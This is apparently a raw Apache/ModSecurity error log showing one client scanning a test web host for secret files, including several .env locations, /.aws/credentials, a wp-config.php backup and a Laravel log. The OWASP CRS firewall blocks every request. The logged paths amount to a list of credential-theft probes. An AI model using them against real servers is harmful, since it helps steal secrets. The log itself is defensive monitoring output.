[Tue Mar 03 00:29:33.742414 2026] [:error] [pid 2439854] [client 195.178.110.33:46056] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aaYdXTmDqvvg871HbIU9lwAAAAY"]
[Tue Mar 03 00:29:33.742580 2026] [:error] [pid 2439854] [client 195.178.110.33:46056] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aaYdXTmDqvvg871HbIU9lwAAAAY"]
[Tue Mar 03 00:29:44.864675 2026] [:error] [pid 2439851] [client 195.178.110.33:59996] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aaYdaHKpPFQwL8r802j_fAAAAAI"]
[Tue Mar 03 00:29:44.864940 2026] [:error] [pid 2439851] [client 195.178.110.33:59996] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aaYdaHKpPFQwL8r802j_fAAAAAI"]
[Tue Mar 03 00:29:44.865735 2026] [:error] [pid 2439851] [client 195.178.110.33:59996] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aaYdaHKpPFQwL8r802j_fAAAAAI"]
[Tue Mar 03 00:29:59.439086 2026] [:error] [pid 2439862] [client 195.178.110.33:45162] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aaYdd_54XEVQxqhpP2KWpQAAAAQ"]
[Tue Mar 03 00:29:59.439322 2026] [:error] [pid 2439862] [client 195.178.110.33:45162] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aaYdd_54XEVQxqhpP2KWpQAAAAQ"]
[Tue Mar 03 00:29:59.439504 2026] [:error] [pid 2439862] [client 195.178.110.33:45162] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aaYdd_54XEVQxqhpP2KWpQAAAAQ"]
[Tue Mar 03 00:30:02.730696 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aaYdeor6Yylb1b_2S0ZRwwAAAAA"]
[Tue Mar 03 00:30:02.730928 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aaYdeor6Yylb1b_2S0ZRwwAAAAA"]
[Tue Mar 03 00:30:02.731098 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aaYdeor6Yylb1b_2S0ZRwwAAAAA"]
[Tue Mar 03 00:30:02.853722 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aaYdeor6Yylb1b_2S0ZRxAAAAAA"]
[Tue Mar 03 00:30:02.853954 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aaYdeor6Yylb1b_2S0ZRxAAAAAA"]
[Tue Mar 03 00:30:02.854132 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aaYdeor6Yylb1b_2S0ZRxAAAAAA"]
[Tue Mar 03 00:30:03.021707 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxQAAAAA"]
[Tue Mar 03 00:30:03.021958 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxQAAAAA"]
[Tue Mar 03 00:30:03.022142 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxQAAAAA"]
[Tue Mar 03 00:30:03.166048 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxgAAAAA"]
[Tue Mar 03 00:30:03.166281 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxgAAAAA"]
[Tue Mar 03 00:30:03.166506 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxgAAAAA"]
[Tue Mar 03 00:30:03.320093 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxwAAAAA"]
[Tue Mar 03 00:30:03.320340 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxwAAAAA"]
[Tue Mar 03 00:30:03.320530 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRxwAAAAA"]
[Tue Mar 03 00:30:03.464864 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRyAAAAAA"]
[Tue Mar 03 00:30:03.465107 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRyAAAAAA"]
[Tue Mar 03 00:30:03.465288 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aaYde4r6Yylb1b_2S0ZRyAAAAAA"]
[Tue Mar 03 00:30:03.709647 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aaYde4r6Yylb1b_2S0ZRyQAAAAA"]
[Tue Mar 03 00:30:03.709882 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aaYde4r6Yylb1b_2S0ZRyQAAAAA"]
[Tue Mar 03 00:30:03.710073 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aaYde4r6Yylb1b_2S0ZRyQAAAAA"]
[Tue Mar 03 00:30:03.944734 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aaYde4r6Yylb1b_2S0ZRygAAAAA"]
[Tue Mar 03 00:30:03.944855 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aaYde4r6Yylb1b_2S0ZRygAAAAA"]
[Tue Mar 03 00:30:03.945068 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aaYde4r6Yylb1b_2S0ZRygAAAAA"]
[Tue Mar 03 00:30:03.945292 2026] [:error] [pid 2439850] [client 195.178.110.33:45172] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.bak"] [unique_id "aaYde4r6Yylb1b_2S0ZRygAAAAA"]
[Tue Mar 03 00:30:31.440684 2026] [:error] [pid 2439854] [client 195.178.110.33:40946] [client 195.178.110.33] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aaYdlzmDqvvg871HbIU9nQAAAAY"]
[Tue Mar 03 00:30:31.441012 2026] [:error] [pid 2439854] [client 195.178.110.33:40946] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aaYdlzmDqvvg871HbIU9nQAAAAY"]
[Tue Mar 03 00:30:31.441188 2026] [:error] [pid 2439854] [client 195.178.110.33:40946] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/storage/logs/laravel.log"] [unique_id "aaYdlzmDqvvg871HbIU9nQAAAAY"]
[Tue Mar 03 00:31:09.100600 2026] [authz_core:error] [pid 2440212] [client 195.178.110.33:36998] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Tue Mar 03 00:31:09.144027 2026] [:error] [pid 2440212] [client 195.178.110.33:36998] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aaYdvWQsrWXPFOBtQAdzNAAAAAE"]
[Tue Mar 03 00:31:09.144356 2026] [:error] [pid 2440212] [client 195.178.110.33:36998] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config/parameters.yml"] [unique_id "aaYdvWQsrWXPFOBtQAdzNAAAAAE"]
